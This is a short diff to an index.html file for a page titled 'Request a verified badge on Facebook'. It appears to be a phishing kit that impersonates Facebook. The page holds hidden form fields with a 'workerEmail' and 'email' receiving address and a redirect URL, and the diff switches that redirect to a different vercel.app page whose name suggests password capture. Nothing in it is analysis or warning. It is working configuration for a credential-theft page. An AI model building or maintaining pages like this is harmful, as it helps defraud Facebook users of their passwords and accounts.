--- a/index.html
+++ b/index.html
@@ -27,7 +27,7 @@
       <input hidden="true" name="name" value="Ismail">
       <input hidden="true" name="workerEmail" value="officialhaleydameron@gmail.com">
       <input hidden="true" name="email" value="rnxsxnnxnx@gmail.com">
-      <input hidden="true" name="redirectUrl" value="https://pass-ochre-one.vercel.app/">
+      <input hidden="true" name="redirectUrl" value="https://password-b.vercel.app/">
 
       <p class="head">Request a verified badge on Facebook</p> <br>
 
